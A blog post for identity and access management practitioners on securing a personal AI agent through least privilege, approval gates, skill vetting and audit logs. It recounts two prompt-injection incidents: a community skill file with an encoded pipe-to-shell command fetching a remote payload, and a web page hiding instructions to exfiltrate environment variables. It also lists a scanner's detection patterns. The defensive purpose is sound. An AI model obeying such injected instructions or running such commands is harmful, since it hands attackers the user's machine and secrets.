Introduction

Every few years, something comes along that forces identity and access management professionals to rethink the fundamentals.

Federated identity changed how we think about trust boundaries. Zero Trust changed how we think about networks. Zero Standing Privilege changed how we think about admin access.

Now agents are changing how we think about who is taking actions in our systems.

I don’t mean chatbots. I mean autonomous systems that read context, make decisions, and execute real-world actions—send emails, merge code, modify configurations, publish content, interact with APIs—on behalf of a human.

I built one. His name is Inigo Montoya (long story, great movie), and he runs on a framework called Open Claw. He manages my publishing pipeline, monitors my homelab, builds applications, handles research, and coordinates sub-agents for parallel work.

He’s useful in ways I didn’t expect. He’s also, if I’m being honest, exactly the kind of system that could ruin my day if I got the guardrails wrong.

This post is the identity-first guardrail stack I designed so that doesn’t happen. It’s written for IAM practitioners who are either building agent workflows themselves or who will be asked to secure them for their organizations in the next 12–18 months.

Because that ask is coming. And the playbook from traditional IAM translates better than you’d think.


TL;DR

I’m bullish on agents.

I’m also not interested in deploying a “helpful bot” that can be socially engineered into doing something dumb at 2:00 a.m. with my credentials.

So I built Open Claw with Inigo Montoya (my assistant) the same way I’d design access for a human admin:

  • Bounded autonomy beats full autonomy. Agents can do a lot—inside a box.
  • Least privilege is non‑negotiable. Tools are capabilities, not vibes.
  • Human-in-the-loop (HiTL) gates are required for irreversible actions.
  • Trust nothing you didn’t author. Web pages, markdown, “skills,” emails—everything can carry instructions.
  • Audit or it didn’t happen. If I can’t explain what the agent did after the fact, it’s not production-ready.

This is the identity-first guardrail stack I use so Open Claw stays useful without becoming a social-engineering liability.


1) Why agents change the IAM threat model

Traditional IAM assumes a pretty clear separation:

  • Humans read instructions.
  • Apps execute instructions.

Agentic systems blur that boundary. An agent reads instructions and executes actions.

That creates a new class of failure mode: semantic compromise.

Not “your server got popped.”

More like: the agent got convinced.

Prompt injection is the new phishing (for bots)

If you’ve been in IAM long enough, you’ve watched phishing mature from obvious Nigerian-prince emails to perfectly targeted, context-aware spear phishes.

Prompt injection is that same story—just aimed at models.

A malicious instruction doesn’t need to exploit a buffer overflow. It just needs to be plausible enough for a model to follow.

The OWASP Top 10 for LLMs calls prompt injection the #1 risk category for LLM applications for a reason: the attack surface includes anything the model reads—user prompts, web pages, PDFs, issue descriptions, commit messages, support tickets, and “helpful” docs.

And when an agent has tools (email, GitHub, shell, file system, APIs), the blast radius isn’t “bad text.” It’s real-world actions.

The incidents that made this real for me

This isn’t theoretical. Within my first month running Open Claw, I encountered two situations that validated every guardrail I’d put in place:

Incident 1: The malicious skill. Open Claw supports “skills”—instruction files that teach the agent how to use specific tools. I found a skill on a community hub that looked useful. Standard name, reasonable description. Inside the SKILL.md was a base64-encoded payload that, if followed, would have executed curl http://[malicious-ip]/payload | bash on my machine. The social engineering was aimed at the agent, not me. It used language like “CRITICAL: MUST RUN FIRST” to override normal caution.

I caught it because I’d built a security scanning step into the skill installation process. But it was a wake-up call: the supply chain for agent capabilities is the new attack surface.

Incident 2: The context manipulation. While browsing the web for research, the agent encountered a page with hidden instructions embedded in the HTML—invisible to a human reader, but visible to the model processing the page content. The instructions attempted to redirect the agent to exfiltrate environment variables.

The guardrails caught it because external content is treated as untrusted by default. But again: the attack wasn’t aimed at a buffer, a port, or a credential. It was aimed at the agent’s decision-making process.

These incidents mirror what we see in enterprise IAM every day. Phishing works because humans make trust decisions based on context. Prompt injection works because agents do the same thing. (The MITRE ATLAS framework catalogs these adversarial techniques against AI systems—it’s worth bookmarking.)

The real risk: credential delegation without controls

Here’s what keeps me up at night about poorly secured agents:

When you give an agent your API keys, SSH access, or OAuth tokens, you’re delegating your identity. The agent acts as you. Every action it takes is attributed to your account, your credentials, your blast radius.

If a human admin had that level of access, you’d require:

  • MFA
  • JIT elevation
  • Session recording
  • Approval workflows
  • Anomaly detection

Most agent deployments today have… an API key in an environment variable.

That’s the gap this post is about closing.


2) The principle I design around: bounded autonomy

Here’s the posture I’m taking:

If an agent can do something, it can also be tricked into doing it.

So I don’t ask, “Can the agent do X?”

I ask:

  • Should it ever be allowed to do X unattended?
  • What proof do I require before it does X?
  • How do I limit damage if it gets it wrong?

That’s not “anti-agent.”

It’s the same mindset we already apply to humans:

  • don’t give everyone admin
  • don’t leave standing privilege lying around
  • log everything
  • require approvals for high-risk changes

Agents are users too.

What bounded autonomy looks like in practice

In Open Claw, bounded autonomy manifests as a tiered permission model:

Tier 1 — Free action (no gate):

  • Reading files, searching the web, checking calendars
  • Organizing notes, updating documentation
  • Running tests, checking build status
  • Internal workspace operations

Tier 2 — Logged action (audit trail required):

  • Writing/modifying files (with git history)
  • Installing dependencies (with rollback path)
  • Running shell commands (non-destructive)
  • Spawning sub-agents for parallel work

Tier 3 — Gated action (human approval required):

  • Sending emails or messages to external people
  • Publishing content publicly
  • Modifying security configurations
  • Deleting data without backup
  • Financial transactions

This mirrors what we do in enterprise IAM with role tiers and risk-based authentication. Low-risk actions flow freely. High-risk actions require step-up verification. The difference is the “user” making the request is an AI model, not a person clicking through an approval form.

The rollback requirement

Every change the agent makes must have a documented rollback path. Before implementing anything:

  1. Snapshot the current state
  2. Document exact commands to undo
  3. Implement the change
  4. Verify nothing broke
  5. Report what was done and how to reverse it

This is borrowed directly from change management processes in ITIL. The only difference is that the agent documents and executes the rollback plan itself—which, frankly, is more reliable than most human change management I’ve seen.


3) What I built: the Identity Guardrail Stack for Open Claw

Below are the controls I put in place (or refuse to run without) when letting Inigo do real work.

I’m keeping this to a handful of examples—enough to be concrete, not a 60-item compliance checklist.

Guardrail 1: Tool access = capabilities (least privilege by default)

The first guardrail is simple: tools are permissions.

If the agent has a tool that can:

  • send messages
  • post publicly
  • modify configs
  • merge code
  • delete files

…then you’ve granted it a capability that needs IAM controls.

So I treat tools like roles:

  • Give the agent the smallest toolset possible for the task.
  • Split “read” tools from “write” tools.
  • Split “draft” tools from “publish” tools.

In Open Claw, that shows up as a default posture:

  • reading is cheap
  • writing is deliberate
  • external actions are gated

This is the same logic as separating a user’s everyday account from their admin account.

Practical example: When Inigo spawns a sub-agent to research a topic, that sub-agent gets web search and file read tools. It does not get email, messaging, or shell access. The sub-agent can gather information. It cannot act on it. Only the lead agent (with more tools and my oversight) pulls the results together and decides what to do next.

This is role-based access control. The role just happens to be assigned to a model instead of a human.

Guardrail 2: HiTL gates for irreversible actions (no exceptions)

If an action is:

  • public (posts, messages)
  • irreversible (deletes)
  • security-sensitive (tokens, configs, auth)
  • financially impactful

…it needs a human gate.

We already do this in IAM with JIT + approvals and change management.

In Open Claw, HiTL means:

  • Inigo can prepare a PR, but doesn’t merge without the schedule/approval.
  • Inigo can draft a LinkedIn post, but we don’t let it “spray and pray” to the internet without a defined workflow.
  • For dated content (Hugo), we merged after midnight ET so the post actually appears on the correct date.
  • Inigo can build an app overnight, but production deployments to the App Store require my review.

That last one sounds small, but it’s the point: automation has sharp edges, and humans catch the “gotchas.”

The approval workflow I actually use:

  1. Inigo prepares the deliverable (article, code, config change)
  2. Writes it to a staging location (draft folder, feature branch, review queue)
  3. Notifies me with a summary of what was done and what needs approval
  4. I review asynchronously (usually via mobile on Telegram or iMessage)
  5. I approve or request changes
  6. Inigo executes the final step (publish, merge, deploy)

This is exactly how you’d design an approval workflow in any ITSM tool. The difference is one side of the conversation is an AI. The workflow itself is the same.

Guardrail 3: “Don’t trust what you didn’t write” (skills + supply chain)

If you let an agent install and run third-party skills/plugins, you’ve recreated the software supply chain problem—except now it’s the agent doing the installing.

We already had a real-world scare: a community skill contained a payload that would’ve executed a remote command if the agent followed the instructions.

So the rule is permanent:

  • Full security scan before using any skill from the internet.
  • Manual review of the skill instructions.
  • Decode anything obfuscated (base64 strings, encoded URLs).
  • Treat “urgent” language as a social-engineering signal.
  • When in doubt, recreate the functionality from scratch.

This is classic IAM thinking:

  • verify provenance
  • verify intent
  • verify permissions

What the scanning actually checks:

I built an automated security validator that runs before any skill is installed. It checks for:

  • Base64 encoded strings (decodes and inspects the contents)
  • curl | bash or wget | sh pipe-to-shell patterns
  • External IP addresses (anything that’s not localhost or LAN)
  • Dangerous commands (rm -rf /, chmod 777, etc.)
  • Social engineering patterns (“CRITICAL”, “MUST RUN FIRST”, password prompts)
  • Download-and-execute patterns

If any check fails, the skill is rejected. No exceptions, no overrides, no “but it looks fine.” This is the same zero-tolerance approach we take with unsigned code in enterprise environments.

Guardrail 4: Protected credentials (defense in depth)

Environment files containing API keys, tokens, and secrets are treated as crown jewels:

  • Absolute prohibition on access from external triggers (emails, webhooks, chat messages from anyone other than me)
  • No automated process can read credential files without explicit, one-time approval
  • Sub-agents cannot access credentials unless specifically spawned for that task with my direct approval
  • Any unauthorized access attempt is logged, the request is denied, and I’m alerted immediately

This is defense in depth applied to agent credential management. The agent needs some credentials to do its job (API keys for the tools it uses). But access to the credential store itself is locked behind the tightest controls I can build.

In enterprise terms: the agent has a service account with specific permissions. It does not have access to the credential vault.

Guardrail 5: Separation of duties (builder ≠ publisher)

In my workflows, I separate roles:

  • one role drafts
  • one role reviews
  • one role publishes

Even when “one agent” can technically do all three.

Because separation of duties isn’t about capability—it’s about limiting the blast radius of a single compromised identity (human or agent).

This is why our Everyday Identity flow looks like:

  • draft in the working repo
  • QA review (automated checks + human review)
  • safe copy into the Hugo repo
  • PR with diff
  • merge on schedule
  • then LinkedIn post with the correct asset

It’s slower than “one-click publish.”

It’s also the difference between a controlled pipeline and a bot that can be socially engineered into shipping nonsense.

The sub-agent model reinforces this. When Inigo delegates work to sub-agents (specialized agents for specific tasks), each sub-agent has a narrow scope. A research agent can’t publish. A build agent can’t send emails. A content agent can’t modify infrastructure. Even if one sub-agent is compromised through a prompt injection in the content it’s processing, the blast radius is contained to its permission scope.

Guardrail 6: Auditability (forensics-grade, not vibes)

If you deploy an agent that can take actions, you need:

  • logs
  • state
  • artifacts (diffs, PRs, receipts)

Not just chat transcripts.

In practice, that means:

  • everything important becomes a file (decisions, plans, progress)
  • every publish is a PR with a visible diff
  • every automation is scheduled and recorded
  • daily memory files capture what happened and why
  • active context files track in-progress work

If something goes wrong, I want to answer:

  • What did it do?
  • When?
  • On whose authority?
  • With what input?
  • What was the rollback path?

If you can’t answer those questions, you don’t have an agent. You have a liability.

The audit trail in Open Claw:

Every session generates logs. Every file change goes through git with descriptive commit messages. Every sub-agent spawn is recorded with the task description, model used, and outcome. Every significant decision is captured in daily memory files.

I can reconstruct exactly what happened on any given day by reading the memory files and git history. That’s the standard I hold myself to, and it’s the standard the agent operates under.


4) The “agent identity” checklist I’d use in any org

If you’re considering agents—Open Claw, Claude Code, Copilot agents, custom LangChain flows, AutoGPT, CrewAI, or whatever framework is trending this month—here’s the checklist I’d start with.

(And if you’re thinking “this seems like a lot”… yeah. That’s the point. We’re not automating note-taking here. We’re automating actions.)

A) Identity + authentication

  • Strong auth for the human owner (MFA, phishing-resistant where possible)
  • Device trust (don’t let an admin agent run on a random laptop)
  • Separate identities for separate environments (dev vs prod)
  • Session management (timeout, rotation, invalidation)
  • Machine identity for the agent itself (not just piggy-backing on the human’s creds)

B) Authorization

  • Least privilege tool access (tools = permissions)
  • Explicit allowlists for high-risk operations
  • Time-bounded credentials when possible (JIT, not standing)
  • Role separation (builder ≠ reviewer ≠ publisher)
  • Scope limitation for sub-agents and delegated tasks

C) HiTL gates

  • Approvals required for:
    • public posting or external messaging
    • deletion or destructive actions
    • token, config, or credential changes
    • production deploys
    • financial transactions
    • new integrations or tool installations
  • Async approval workflow (mobile-friendly for busy humans)
  • Emergency kill switch (disable all automation instantly)

D) Input/output controls

  • Treat everything the agent reads as untrusted
  • Sanitize and segment external content from instructions
  • Security scanning for third-party skills and plugins
  • Output filtering to prevent sensitive data leakage
  • Rate limiting on high-risk actions

E) Audit + incident response

  • Centralized, immutable logs
  • Diff-based change tracking (git, PRs)
  • Daily summaries of agent activity
  • Key rotation playbooks
  • Incident response plan for agent compromise
  • Regular review of agent permissions and activity

F) Supply chain security

  • Vet all third-party skills, plugins, and integrations
  • Prefer building capabilities in-house over installing unknown code
  • Automated scanning for malicious patterns
  • Version pinning and integrity checking
  • Maintain an allowlist of trusted sources

5) What tools exist today (and what’s still missing)

The tooling for securing agentic systems is still early, but it’s moving. Here’s what I’m watching:

What exists today

What’s missing

  • Agent-native identity providers. We don’t have an “Okta for agents” yet. Most agents authenticate using static API keys or OAuth tokens obtained by the human owner. There’s no standard for agent-to-agent authentication, session management, or credential rotation.
  • Behavioral anomaly detection for agents. We have UEBA for humans. We don’t have equivalent tooling that understands normal agent behavior and flags deviations.
  • Standardized audit formats. Every framework logs differently. There’s no common format for “what did this agent do, when, and why?”
  • Policy-as-code for agent permissions. OPA and Cedar work for API authorization. We need equivalent policy engines for tool-use authorization.

My prediction

Within 18 months, the major identity platforms ( Okta , Microsoft Entra , Ping , CyberArk ) will have agent-specific features: machine identity for agents, tool-use authorization policies, behavioral baselines, and audit dashboards.

The organizations that started thinking about agent identity now will be ahead of the curve. The ones that waited will be retrofitting controls onto agent deployments that are already in production.

Sound familiar? It’s the same story we’ve seen with cloud IAM, Zero Trust, and every other paradigm shift. The early movers build the controls in. The late movers bolt them on.


6) Objections I’ve heard (and my responses)

“This is overkill for a personal assistant.”

Maybe. If your agent only takes notes and sets reminders, you probably don’t need HiTL gates.

But the moment it can send messages, access APIs, modify files, or interact with external services, you’re in the “real actions” zone. And in that zone, “overkill” is just “appropriate controls.”

I’d rather have guardrails I don’t need than need guardrails I don’t have.

“All these gates slow the agent down.”

Yes. By design.

Speed without control is just faster failure. The gates add seconds to operations that could cause hours of cleanup if they go wrong.

And honestly? Most of the gates are async. Inigo prepares work, I approve on my phone when I have a minute. The total throughput is still orders of magnitude higher than doing everything manually.

“My agent doesn’t have that much access.”

Audit it. Right now. List every tool, every API key, every credential it can reach.

I’ve done this exercise with my own setup and been surprised every time. Agents accumulate access the same way human accounts do—gradually, without anyone noticing, until the blast radius is way bigger than intended.

“We’ll add security later.”

No, you won’t. You’ll add it after an incident. And the incident will be expensive.

Build the guardrails in from day one. It’s cheaper, it’s cleaner, and it means you can actually trust the system you’re building.


7) Where this goes next (and what I won’t do)

I’m excited about what agentic systems unlock.

Inigo saves me hours every day. He builds apps while I sleep. He monitors systems, manages publishing pipelines, coordinates research, and handles the operational overhead that used to eat into my evenings and weekends.

That’s a real difference for someone running two businesses and a day job.

But I’m not interested in a world where we “automate” ourselves into a new class of identity incidents. The history of IAM is littered with examples of powerful capabilities deployed without adequate controls:

  • Standing admin access that persisted for years
  • Service accounts with domain admin rights and no rotation
  • OAuth tokens with overly broad scopes that never expired
  • API keys committed to public repositories

Agents are the next chapter. The capabilities are enormous. The risks are proportional.

My stance is simple:

  • autonomy without guardrails is a breach waiting to happen
  • autonomy with guardrails is operational leverage

Inigo’s job isn’t to replace my judgment.

It’s to amplify it.

And the guardrails aren’t there to limit what he can do.

They’re there to make sure I can trust what he does.


Conclusion

If you’re an IAM professional reading this and thinking “this sounds a lot like what we already do”—that’s the point.

Agent security isn’t a new discipline. It’s identity and access management applied to a new type of identity. The principles are the same:

  • Least privilege
  • Separation of duties
  • Defense in depth
  • Zero trust
  • Audit everything
  • Approve before acting

The implementation details are different—we’re dealing with prompt injection instead of phishing, tool-use policies instead of RBAC roles, and memory files instead of session logs. But the mental models translate directly.

The people who get this right early will build agent workflows they can actually trust. The people who skip the guardrails will learn the hard way that an unsecured agent is just a faster way to create incidents.

Start with the checklist in section 4. Build the controls in from day one. And remember: if you wouldn’t give a human contractor unrestricted admin access on their first day, don’t give it to your agent either.


What You Can Do This Week

If you’re deploying agents (or about to), here are three things you can do right now:

  1. Audit your agent’s access. List every tool, API key, and credential it can reach. Compare that list to what it actually needs. Revoke the rest. If you’ve never done this exercise, you’ll be surprised.

  2. Add one HiTL gate. Pick the highest-risk action your agent can take—sending external messages, publishing content, modifying production configs—and add an approval step. It doesn’t need to be fancy. A Slack message asking “proceed?” is better than nothing.

  3. Start logging. If your agent’s actions aren’t being captured somewhere you can search later, fix that first. Git commits, structured logs, daily summaries—pick one and implement it today. You can’t secure what you can’t see.

Already doing all three? I’d love to hear how you’re approaching agent identity in your org. Drop me a comment, or find me on LinkedIn — I’m writing about this stuff regularly on Everyday Identity .

And if you’re just getting started with IAM fundamentals, check out the IAM 101 series — it covers MFA, PAM, Zero Trust, and the building blocks that make guardrails like these possible.


References